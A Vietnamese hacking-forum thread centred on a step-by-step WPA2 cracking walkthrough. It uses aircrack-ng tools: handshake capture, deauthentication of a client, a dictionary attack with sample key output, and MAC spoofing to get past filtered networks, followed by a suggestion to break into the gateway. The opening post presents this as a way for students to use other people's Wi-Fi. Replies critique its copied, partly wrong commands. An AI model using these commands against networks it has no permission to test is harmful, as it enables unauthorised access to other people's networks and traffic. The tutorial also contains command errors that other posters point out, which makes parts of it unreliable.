banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập hướng dẫn chi tiết tấn công một mạng wifi (wireless)  XML
  [Question]   hướng dẫn chi tiết tấn công một mạng wifi (wireless) 30/05/2008 03:45:28 (+0700) | #1 | 133316
[Avatar]
tranduyninh
Member

[Minus]    0    [Plus]
Joined: 05/07/2006 12:05:48
Messages: 253
Location: aiowebs.net
Offline
[Profile] [PM] [WWW] [Yahoo!]
ngày nay ở việt nam wireless ngày càng dày đặc , nhưng muốn dùng thì cũng không dễ , nhất là quân sinh viên chúng ta ,bởi vì đa phần được bảo mật bằng wpa2 hay mac adress limit , bài này sẽ giúp bạn crack wpa và cách tấn công mac adress , qua đó bạn biết mạng wifi của bạn bị tấn công như thế nào và có cách phòng chống luôn
công cụ dùng trong bài : back track 2 live cd . download :remote exploit forum + google
mac adress của máy tấn công :00:0F:B5:88:AC:82
mac adress của máy trong mạng wifi :00:0F:B5:FD:FB:C2
mac adress của acssespoint : 00:14:6C:7E:40:80
tên của mạng wifi :teddy
Access point channel: 9
Wireless interface: ath0

bước 1 : chuyển wireless card qua chế độ monitor

ifconfig eth0 up
iwconfig eth0 mode monitor

iwconfig

lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
bước 2 : run airodum-ng để collect authentical :

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0

*
-c 9 is chanel của network
- -bssid 00:14:6C:7E:40:80 is the access point MAC address.
-w psk file sẽ lưu IVs
ath0 is the interface name.
khi thành công bạn được như sau :

CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 116


WPA handshake: 00:14:6C:7E:40:80” ở trên cùng nghĩa là airodump đang collect IVs file.

bây giờ thì ngồi đợi nha ( có khi cả ngày ha ha ha )
nhưng cách này sẽ giúp bạn rút ngắn thời gian đợi rất nhiều :
run aireplay-ng để tạo ra nhiều thông tin mã hóa hơn :

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0
khi thành công :
11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]

sau đó là đợi , càng lâu càng tốt nha
cuối cùng run aircrack-ng để crack :
aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk.cap
psk.cap là file capture ở trên
password.lst : đường dẫn đến file chứa password trong ổ cứng ( có thể là password.txt)
khi thành công :
Aircrack-ng 0.8


[00:00:00] 2 keys tested (37.20 k/s)


KEY FOUND! [ 12345678 ]


Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD

Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71

EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB

vậy là có thể crack thành công wpa rồi
lưu ý nếu bước cuối cùng không ra key thì đừng xóa file psk đi nha , copy cất kỹ đi từ từ crack nha

VỚI MẠNG WIFI BỊ KHÓA MAC THÌ :khi bạn kết nối sẽ không có hiện tượng gì nhưng không kết nối được
muốn vào mạng thì phải thay mac adress của mình cho giống một trong những máy trong mạng đó :
bạn có thể đến gần và coi địa chỉ mac của một máy trong mạng lan đó sau đó đổi mac của mình giống với máy đó thì sẽ vào được , sau khi vào được thì cố gắng xâm nhập vào gateway lấy thêm mac













Các bạn giúp mình giải cứu bạn gái này nha : http://bit.ly/23mHJE ( đây là 1 cuộc thi đó ) không biêt các hắc cơ có ý kiến như thế nào ?
[Up] [Print Copy]
  [Question]   hướng dẫn chi tiết tấn công một mạng wifi (wireless) 30/05/2008 08:56:15 (+0700) | #2 | 133363
[Avatar]
quanta
Moderator

Joined: 28/07/2006 14:44:21
Messages: 7265
Location: $ locate `whoami`
Offline
[Profile] [PM]

tranduyninh wrote:

...

tên của mạng wifi :teddy
Access point channel: 9
Wireless interface: ath0
 

bước 1 : chuyển wireless card qua chế độ monitor

ifconfig eth0 up
iwconfig eth0 mode monitor

iwconfig
lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:"" Nickname:""
...
 

Hì, trên "ath0" dưới "eth0" rồi.

Bạn nên định dạng bài viết cho đẹp hơn. Cái gì trích thì nên cho vào thẻ [ quote ], mã lệnh thì nên cho vào thẻ [ code ], đoạn nào cần lưu ý thì bôi đậm lên, ...
Let's build on a great foundation!
[Up] [Print Copy]
  [Question]   Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) 30/05/2008 09:55:09 (+0700) | #3 | 133372
[Avatar]
SuperChicken
Elite Member

[Minus]    0    [Plus]
Joined: 11/07/2006 18:31:27
Messages: 635
Location: bottom of hell
Offline
[Profile] [PM]
Ây da, lâu lâu mới thấy 1 bài hay hay, để bữa nào nghịch thử xem sao smilie
[Up] [Print Copy]
  [Question]   Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) 30/05/2008 12:54:39 (+0700) | #4 | 133402
[Avatar]
tmd
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
Tui thấy cái này hay hơn nè anh em, Nguyên mẫu tiếng Anh của topic này ở link này đây.

http://www.aircrack-ng.org/doku.php?id=cracking_wpa

Tutorial: How to Crack WPA/WPA2

Version: 1.15.1 May 9, 2008
By: darkAudax


Introduction

This tutorial walks you through cracking WPA/WPA2 networks which use pre-shared keys. I recommend you do some background reading to better understand what WPA/WPA2 is. The Wiki links page has a WPA/WPA2 section. he best document describing WPA is Wi-Fi Security - WEP, WPA and WPA2. This is the link to download the PDF directly. The WPA Packet Capture Explained tutorial is a companion to this tutorial.

WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows the network as having the authentication type of PSK, otherwise, don't bother trying to crack it.

There is another important difference between cracking WPA/WPA2 and WEP. This is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques can be used against WPA/WPA2. That is, because the key is not static, so collecting IVs like when cracking WEP encryption, does not speed up the attack. The only thing that does give the information to start an attack is the handshake between client and AP. Handshaking is done when the client connects to the network. Although not absolutely true, for the purposes of this tutorial, consider it true. Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack the pre-shared key.

The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length. Conversely, if you want to have an unbreakable wireless network at home, use WPA/WPA2 and a 63 character password composed of random characters including special symbols.

The impact of having to use a brute force approach is substantial. Because it is very compute intensive, a computer can only test 50 to 300 possible keys per second depending on the computer CPU. It can take hours, if not days, to crunch through a large dictionary. If you are thinking about generating your own password list to cover all the permutations and combinations of characters and special symbols, check out this brute force time calculator first. You will be very surprised at how much time is required.

There is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them. So the techniques you use are identical.

It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it.

I would like to acknowledge and thank the Aircrack-ng team for producing such a great robust tool.

Please send me any constructive feedback, positive or negative. Additional troubleshooting ideas and tips are especially welcome.

Assumptions

First, this solution assumes:

*
You are using drivers patched for injection. Use the injection test to confirm your card can inject.
*
You are physically close enough to send and receive access point and wireless client packets. Remember that just because you can receive packets from them does not mean you may will be able to transmit packets to them. The wireless card strength is typically less then the AP strength. So you have to be physically close enough for your transmitted packets to reach and be received by both the AP and the wireless client. You can confirm that you can communicate with the specific AP by following these instructions.
*
You are using v0.9.1 or above of aircrack-ng. If you use a different version then some of the command options may have to be changed.

Ensure all of the above assumptions are true, otherwise the advice that follows will not work. In the examples below, you will need to change “ath0” to the interface name which is specific to your wireless card.
Equipment used

To follow this tutorial at home, you must have two wireless cards.

In this tutorial, here is what was used:

*
MAC address of PC running aircrack-ng suite: 00:0F:B5:88:AC:82
*
MAC address of the wireless client using WPA2: 00:0F:B5:FD:FB:C2
*
BSSID (MAC address of access point): 00:14:6C:7E:40:80
*
ESSID (Wireless network name): teddy
*
Access point channel: 9
*
Wireless interface: ath0


You should gather the equivalent information for the network you will be working on. Then just change the values in the examples below to the specific network.
..........
 


tranduyninh wrote:
ngày nay ở việt nam wireless ngày càng dày đặc , nhưng muốn dùng thì cũng không dễ , nhất là quân sinh viên chúng ta ,bởi vì đa phần được bảo mật bằng wpa2 hay mac adress limit , bài này sẽ giúp bạn crack wpa và cách tấn công mac adress , qua đó bạn biết mạng wifi của bạn bị tấn công như thế nào và có cách phòng chống luôn  


smilie
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Up] [Print Copy]
  [Question]   Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) 30/05/2008 13:27:19 (+0700) | #5 | 133404
[Avatar]
nlfb
Journalist

[Minus]    0    [Plus]
Joined: 09/07/2003 16:41:21
Messages: 1175
Location: HCM
Offline
[Profile] [PM] [Yahoo!]
Hê hê, em gà món mạng lắm, nhưng sao cái MAC 2 bài giống nhau nhể? smilie, cái này bác copy ở đâu thế, vì công bác dịch thì chắc bác cũng sẽ bỏ thêm chút công đặt các đoạn lệnh vào tag mà. Lộ quá, lộ quá smilie
[Up] [Print Copy]
  [Question]   Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) 01/06/2008 07:21:30 (+0700) | #6 | 133632
[Avatar]
lamhoang20002000
Member

[Minus]    0    [Plus]
Joined: 03/04/2005 16:32:02
Messages: 52
Offline
[Profile] [PM] [Yahoo!]
@ tranduyninh: Tui có xem một cái video của nước ngoài. Hình như hướng dẫn này pác dựa theo video đó hả. I xì đúc từ các command, đến cả password "123...8" nữa. Dù sao cũng cảm ơn pác.
[Up] [Print Copy]
  [Question]   Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) 02/06/2008 04:52:25 (+0700) | #7 | 133732
[Avatar]
tranduyninh
Member

[Minus]    0    [Plus]
Joined: 05/07/2006 12:05:48
Messages: 253
Location: aiowebs.net
Offline
[Profile] [PM] [WWW] [Yahoo!]

nlfb wrote:
Hê hê, em gà món mạng lắm, nhưng sao cái MAC 2 bài giống nhau nhể? smilie, cái này bác copy ở đâu thế, vì công bác dịch thì chắc bác cũng sẽ bỏ thêm chút công đặt các đoạn lệnh vào tag mà. Lộ quá, lộ quá smilie 

ha
cái này đúng là copy thật nhưng tiếng anh > tiếng việt cũng có công ha .
e rằng trong diễn đàn ít người thích copy từ tiếng anh sang tiếng việt lắm .
Các bạn giúp mình giải cứu bạn gái này nha : http://bit.ly/23mHJE ( đây là 1 cuộc thi đó ) không biêt các hắc cơ có ý kiến như thế nào ?
[Up] [Print Copy]
  [Question]   hướng dẫn chi tiết tấn công một mạng wifi (wireless) 02/06/2008 04:54:18 (+0700) | #8 | 133733
[Avatar]
tranduyninh
Member

[Minus]    0    [Plus]
Joined: 05/07/2006 12:05:48
Messages: 253
Location: aiowebs.net
Offline
[Profile] [PM] [WWW] [Yahoo!]

quanta wrote:

tranduyninh wrote:

...

tên của mạng wifi :teddy
Access point channel: 9
Wireless interface: ath0
 

bước 1 : chuyển wireless card qua chế độ monitor

ifconfig eth0 up
iwconfig eth0 mode monitor

iwconfig
lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:"" Nickname:""
...
 

Hì, trên "ath0" dưới "eth0" rồi.

Bạn nên định dạng bài viết cho đẹp hơn. Cái gì trích thì nên cho vào thẻ [ quote ], mã lệnh thì nên cho vào thẻ [ code ], đoạn nào cần lưu ý thì bôi đậm lên, ... 

cám ơn bro nhắc nhở
Các bạn giúp mình giải cứu bạn gái này nha : http://bit.ly/23mHJE ( đây là 1 cuộc thi đó ) không biêt các hắc cơ có ý kiến như thế nào ?
[Up] [Print Copy]
  [Question]   Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) 02/06/2008 06:20:48 (+0700) | #9 | 133745
[Avatar]
tmd
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
Nếu không ai nói thì cái công "tự nhận" và "convert sai kỹ thuật" được ém luôn. Lỡ có ai đó không rành kỹ thuật vào coi sẽ hiểu sai vấn đề.
Nói thẳng ra là ăn cắp bản quyền tác giả.
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Up] [Print Copy]
  [Question]   Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) 02/06/2008 23:24:09 (+0700) | #10 | 133822
[Avatar]
eyesdog
Elite Member

[Minus]    0    [Plus]
Joined: 18/01/2002 06:54:01
Messages: 94
Offline
[Profile] [PM]
Các tut ngon nhất của tây nhiều khi nói vậy nhưng không phải vậy, không thử, không hiểu, thực hiện máy móc theo tut mà được thì tôi chết liền !!!
[Up] [Print Copy]
  [Question]   Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) 03/06/2008 04:56:40 (+0700) | #11 | 133873
[Avatar]
nlfb
Journalist

[Minus]    0    [Plus]
Joined: 09/07/2003 16:41:21
Messages: 1175
Location: HCM
Offline
[Profile] [PM] [Yahoo!]
-c 9 is chanel của network  


Cái này có phải là translate hôn smilie

bây giờ thì ngồi đợi nha ( có khi cả ngày ha ha ha )  


Thử chưa? Đưa cảm nhận vào à smilie
[Up] [Print Copy]
  [Question]   Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) 04/06/2008 13:05:44 (+0700) | #12 | 134090
[Avatar]
quanta
Moderator

Joined: 28/07/2006 14:44:21
Messages: 7265
Location: $ locate `whoami`
Offline
[Profile] [PM]

tranduyninh wrote:

...
cái này đúng là copy thật nhưng tiếng anh > tiếng việt cũng có công ha .
 

Đúng là cũng có công thật. Nhưng, tôi nghĩ như này sẽ hay hơn:
Từ bài viết đó, bạn nên đọc để hiểu và thực hành trên một môi trường thật, sau đó ghi lại và giải thích các bước chính. Như thế ít ra bạn còn thu được kiến thức gì đó.

Tôi hỏi bạn vài câu:
1. Đoạn này của bạn có chạy được không?

tranduyninh wrote:

bước 1: chuyển wireless card qua chế độ monitor
Code:
ifconfig ath0 up
iwconfig ath0 mode monitor

 

(Đã nhắc sửa eth0 thành ath0 nhưng cũng không sửa)

2. Tại sao bạn không dùng airmon-ng để chuyển wireless card sang chế độ monitor:
Code:
# airmon-ng start ath0


3.

tranduyninh wrote:

bước 2 : run airodum-ng để collect authentical :

Code:
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0

*
-c 9 is chanel của network
- -bssid 00:14:6C:7E:40:80 is the access point MAC address.
-w psk file sẽ lưu IVs
ath0 is the interface name.
 

tranduyninh wrote:

cuối cùng run aircrack-ng để crack :
Code:
aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk.cap

psk.cap là file capture ở trên
password.lst : đường dẫn đến file chứa password trong ổ cứng ( có thể là password.txt)
 

"psk" là cái gì? Tại sao ở trên chỉ có -w psk, còn ở dưới "file capture" lại là psk.cap?

Tóm lại, tôi có một góp ý là bạn nên "thử" thực hiện bài hướng dẫn này trên môi trường thật. Sau đó sửa lại bài viết, chú ý định dạng cho cẩn thận. Nếu không, tôi đành dời nó vào Trash. Cảm ơn.
Let's build on a great foundation!
[Up] [Print Copy]
  [Question]   Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) 04/06/2008 14:47:45 (+0700) | #13 | 134095
[Avatar]
mco3co
Member

[Minus]    0    [Plus]
Joined: 03/06/2008 14:44:26
Messages: 26
Location: Lương Sơn Bạc!
Offline
[Profile] [PM] [WWW]
Đọc mà hoa cả mắt smilie
Toàn "core" là "core" thôi à!

lamhoang20002000 wrote:
@ tranduyninh: Tui có xem một cái video của nước ngoài. Hình như hướng dẫn này pác dựa theo video đó hả. I xì đúc từ các command, đến cả password "123...8" nữa. Dù sao cũng cảm ơn pác.  


Bác có video hay link thì share lên đi, để anh em tò mò làm gì! smilie

PS: Mình nghĩ đây là chủ đề khá hay bác nào có thông tin "hay hay" post lên đây anh em học hỏi với nhé!
[Up] [Print Copy]
  [Question]   Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) 07/06/2008 04:07:43 (+0700) | #14 | 134452
[Avatar]
vikjava
Elite Member

[Minus]    0    [Plus]
Joined: 28/06/2004 02:32:38
Messages: 926
Location: NQN
Offline
[Profile] [PM]
Hi mới tìm hiểu về wireless. Sẵn tiện cho mình hỏi luôn làm thế nào để biết mạng wifi đó dùng wep hay wpa để mã hóa dữ liệu truyền đi ?
[Up] [Print Copy]
  [Question]   Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) 07/06/2008 04:20:00 (+0700) | #15 | 134455
[Avatar]
4hfoo
Elite Member

[Minus]    0    [Plus]
Joined: 29/01/2007 01:50:20
Messages: 115
Offline
[Profile] [PM]
Để biết mạng wifi có mã hóa hay không, bạn có thể dùng các phần mềm quét (wireless network scanner).
Một số phần mềm khá phổ biến: NetStumbler (trong Windows), airodump-ng (trong bộ aircrack-ng) ...

Thân
[Up] [Print Copy]
  [Question]   Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) 07/06/2008 04:48:57 (+0700) | #16 | 134457
[Avatar]
quanta
Moderator

Joined: 28/07/2006 14:44:21
Messages: 7265
Location: $ locate `whoami`
Offline
[Profile] [PM]

vikjava wrote:
Hi mới tìm hiểu về wireless. Sẵn tiện cho mình hỏi luôn làm thế nào để biết mạng wifi đó dùng wep hay wpa để mã hóa dữ liệu truyền đi ? 

Code:
# iwlist wlan0 scan
wlan0     Scan completed :
          Cell 01 - Address: 00:40:96:57:B2:5A
                    ESSID:""
                    Mode:Master
                    Frequency:2.437 GHz (Channel 6)
                    Channel:6
                    Quality=33/100  Signal level=-89 dBm  Noise level=-87 dBm
                    Encryption key:on
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s
                    Extra:tsf=00000086ec9511d5
          Cell 02 - Address: 00:01:38:A8:2A:FD
                    ESSID:""
                    Mode:Master
                    Frequency:2.457 GHz (Channel 10)
                    Channel:10
                    Quality=81/100  Signal level=-53 dBm  Noise level=-90 dBm
                    Encryption key:on
                    IE: IEEE 802.11i/WPA2 Version 1
                        Group Cipher : TKIP
                        Pairwise Ciphers (2) : TKIP CCMP
                        Authentication Suites (1) : PSK
                       Preauthentication Supported
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                              9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
                              48 Mb/s; 54 Mb/s
                    Extra:tsf=000000196d72a8f8
          Cell 03 - Address: 00:18:39:EA:EE:AE
                    ESSID:""
                    Mode:Master
                    Frequency:2.462 GHz (Channel 11)
                    Channel:11
                    Quality=26/100  Signal level=-93 dBm  Noise level=-86 dBm
                    Encryption key:on
                    IE: WPA Version 1
                        Group Cipher : TKIP
                        Pairwise Ciphers (1) : TKIP
                        Authentication Suites (1) : PSK
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s
                              24 Mb/s; 36 Mb/s; 54 Mb/s; 6 Mb/s; 9 Mb/s
                              12 Mb/s; 48 Mb/s
                    Extra:tsf=00000006bcfb5183
          Cell 04 - Address: 00:1D:7E:47:1Bsmilie1
                    ESSID:""
                    Mode:Master
                    Frequency:2.462 GHz (Channel 11)
                    Channel:11
                    Quality=37/100  Signal level=-87 dBm  Noise level=-86 dBm
                    Encryption key:on
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                              12 Mb/s; 24 Mb/s; 36 Mb/s; 9 Mb/s; 18 Mb/s
                              48 Mb/s; 54 Mb/s
                    Extra:tsf=00000050e7fb3181

Bạn để ý phần IE:

Ngoài ra, bạn có thể dùng NetworkManager, chí vào "Cell" định kết nối, bạn sẽ biết:


Let's build on a great foundation!
[Up] [Print Copy]
  [Question]   Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) 08/06/2008 07:21:07 (+0700) | #17 | 134609
[Avatar]
tranduyninh
Member

[Minus]    0    [Plus]
Joined: 05/07/2006 12:05:48
Messages: 253
Location: aiowebs.net
Offline
[Profile] [PM] [WWW] [Yahoo!]
cả tuần mới có dịp lên mạng , vào hva thấy bị nhắc nhở buồn quá . cũng lưu ý các bạn là khi mình dùng cách trên với broadcom wireless thì nó cứ trơ ra .
Các bạn giúp mình giải cứu bạn gái này nha : http://bit.ly/23mHJE ( đây là 1 cuộc thi đó ) không biêt các hắc cơ có ý kiến như thế nào ?
[Up] [Print Copy]
  [Question]   Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) 08/06/2008 07:30:55 (+0700) | #18 | 134611
pnco
HVA Friend

Joined: 24/06/2005 16:33:48
Messages: 515
Offline
[Profile] [PM] [WWW]

tranduyninh wrote:
cả tuần mới có dịp lên mạng , vào hva thấy bị nhắc nhở buồn quá . cũng lưu ý các bạn là khi mình dùng cách trên với broadcom wireless thì nó cứ trơ ra . 

Buồn gì, có người nhắc nhở chứng tỏ là có người quan tâm tới bạn.
Ây da, lâu lâu mới thấy 1 bài hay hay, để bữa nào nghịch thử xem sao 

Nghe câu này thấy không buồn chứ smilie
Tóm lại, tôi có một góp ý là bạn nên "thử" thực hiện bài hướng dẫn này trên môi trường thật. Sau đó sửa lại bài viết, chú ý định dạng cho cẩn thận. 

Bạn nên cảm thấy quý trọng những lời góp ý chân thành như thế này, nó sẽ giúp bạn tiến bộ hơn lên.
[Up] [Print Copy]
  [Question]   Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) 08/06/2008 08:52:34 (+0700) | #19 | 134618
[Avatar]
quanta
Moderator

Joined: 28/07/2006 14:44:21
Messages: 7265
Location: $ locate `whoami`
Offline
[Profile] [PM]

eyesdog wrote:
Các tut ngon nhất của tây nhiều khi nói vậy nhưng không phải vậy, không thử, không hiểu, thực hiện máy móc theo tut mà được thì tôi chết liền !!!  

Tớ đồng ý với quan điểm này. Chẳng hạn, tớ dùng Fedora 9, cài aircrack-ng bằng yum. Thông tin wireless card như sau:
Code:
# lsmod | grep 3945
iwl3945               145244  0 
mac80211              185184  1 iwl3945
cfg80211               24712  2 iwl3945,mac80211

Code:
# lspci | grep Wireless
06:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG Network Connection (rev 02)


Cài xong, hăm hở thử thực hiện. Ngay bước đầu tiên, chuyển wireless card sang chế độ "monitor" đã gặp ngay lỗi:
Code:
# airmon-ng start wlan0

Interface       Chipset         Driver

wlan0                   iwl3945 - [phy0]/usr/sbin/airmon-ng: line 338: /sys/class/ieee80211/phy0/add_iface: No such file or directory
mon0: unknown interface: No such device

                                (monitor mode enabled on mon0)
Let's build on a great foundation!
[Up] [Print Copy]
  [Question]   Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) 16/06/2008 04:38:53 (+0700) | #20 | 135693
dangkita
Member

[Minus]    0    [Plus]
Joined: 14/01/2008 16:39:58
Messages: 9
Offline
[Profile] [PM]
hack wifi chả dễ tí nào! Làm rất mệt ( tớ chưa thành công bao giờ cả)!
Mà còn tuỳ loại card của mình nữa, phải xem phần mềm có hỗ trợ card đó hay không, nếu không thì cũng...vứt!
[Up] [Print Copy]
  [Question]   Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) 16/06/2008 07:09:26 (+0700) | #21 | 135708
[Avatar]
tranduyninh
Member

[Minus]    0    [Plus]
Joined: 05/07/2006 12:05:48
Messages: 253
Location: aiowebs.net
Offline
[Profile] [PM] [WWW] [Yahoo!]
cám ơn mọi người đã quan tâm chăm sóc .
Các bạn giúp mình giải cứu bạn gái này nha : http://bit.ly/23mHJE ( đây là 1 cuộc thi đó ) không biêt các hắc cơ có ý kiến như thế nào ?
[Up] [Print Copy]
  [Question]   Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) 23/06/2008 10:44:04 (+0700) | #22 | 136991
helllove
Member

[Minus]    0    [Plus]
Joined: 14/03/2007 00:58:03
Messages: 11
Offline
[Profile] [PM]
tranduyninh wrote:


...
cái này đúng là copy thật nhưng tiếng anh > tiếng việt cũng có công ha .



Đúng là cũng có công thật. Nhưng, tôi nghĩ như này sẽ hay hơn:
Từ bài viết đó, bạn nên đọc để hiểu và thực hành trên một môi trường thật, sau đó ghi lại và giải thích các bước chính. Như thế ít ra bạn còn thu được kiến thức gì đó.

Tôi hỏi bạn vài câu:
1. Đoạn này của bạn có chạy được không?

tranduyninh wrote:


bước 1: chuyển wireless card qua chế độ monitor
Code:

ifconfig ath0 up
iwconfig ath0 mode monitor






(Đã nhắc sửa eth0 thành ath0 nhưng cũng không sửa)

2. Tại sao bạn không dùng airmon-ng để chuyển wireless card sang chế độ monitor:
Code:

# airmon-ng start ath0



3.

tranduyninh wrote:


bước 2 : run airodum-ng để collect authentical :

Code:

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0


*
-c 9 is chanel của network
- -bssid 00:14:6C:7E:40:80 is the access point MAC address.
-w psk file sẽ lưu IVs
ath0 is the interface name.



tranduyninh wrote:


cuối cùng run aircrack-ng để crack :
Code:

aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk.cap


psk.cap là file capture ở trên
password.lst : đường dẫn đến file chứa password trong ổ cứng ( có thể là password.txt)



"psk" là cái gì? Tại sao ở trên chỉ có -w psk, còn ở dưới "file capture" lại là psk.cap?

Tóm lại, tôi có một góp ý là bạn nên "thử" thực hiện bài hướng dẫn này trên môi trường thật. Sau đó sửa lại bài viết, chú ý định dạng cho cẩn thận. Nếu không, tôi đành dời nó vào Trash. Cảm ơn.



Mình nghĩ bạn ấy tuy copy,nhưng quá trình mình thấy cũng okie đấy chứ
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0 =>>> psk là cái tên file nguoi crack đặt,và file ra sẽ có đuôi psk.cap,đó la default .=> "psk" là cái gì? Tại sao ở trên chỉ có -w psk, còn ở dưới "file capture" lại là psk.cap?.Đây là câu trả lời cho bạn tranduyninh
thân chào
[Up] [Print Copy]
  [Question]   Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) 25/06/2008 07:46:46 (+0700) | #23 | 137479
hanjyung
Member

[Minus]    0    [Plus]
Joined: 12/07/2004 22:05:02
Messages: 2
Offline
[Profile] [PM]
Cái này là crack WEP-key 64 bit chứ WPA nỗi gì.
Nếu muốn Crack WEP-key nhanh không tốn nhiều công sức thì tham khào trang này.
http://thegioimang.org/forum/showthread.php?t=394
[Up] [Print Copy]
  [Question]   Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) 25/06/2008 07:57:11 (+0700) | #24 | 137483
[Avatar]
quanta
Moderator

Joined: 28/07/2006 14:44:21
Messages: 7265
Location: $ locate `whoami`
Offline
[Profile] [PM]

hanjyung wrote:
Cái này là crack WEP-key 64 bit chứ WPA nỗi gì.
Nếu muốn Crack WEP-key nhanh không tốn nhiều công sức thì tham khào trang này.
http://thegioimang.org/forum/showthread.php?t=394
 

Cái "này" là cái nào? Bạn đọc http://www.aircrack-ng.org/doku.php?id=cracking_wpa chưa?
Let's build on a great foundation!
[Up] [Print Copy]
  [Question]   Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) 25/06/2008 22:30:24 (+0700) | #25 | 137639
[Avatar]
vikjava
Elite Member

[Minus]    0    [Plus]
Joined: 28/06/2004 02:32:38
Messages: 926
Location: NQN
Offline
[Profile] [PM]
Một hướng dẫn về thiết lập mô hình tấn công wireless khá đầy đủ http://my.opera.com/thuynt/blog/2008/05/22/ky-thuat-do-khoa-wep-cua-mang-wifi-step-by-step

Trên mạng có rất nhiều video mô tả quá trình tấn công vào mạng wireless nhưng cái nì Cracking a 128 Bit Wep key(auditor) là dễ hiểu nhất. Một số cái khác thì cũng cùng bản chất nhưng có thể dùng tool khác , và môi trường khác.
[Up] [Print Copy]
  [Question]   Re: hướng dẫn chi tiết tấn công một mạng wifi (wireless) 17/02/2009 05:44:05 (+0700) | #26 | 169685
[Avatar]
TheShinichi
Member

[Minus]    0    [Plus]
Joined: 25/03/2005 01:40:31
Messages: 182
Offline
[Profile] [PM]
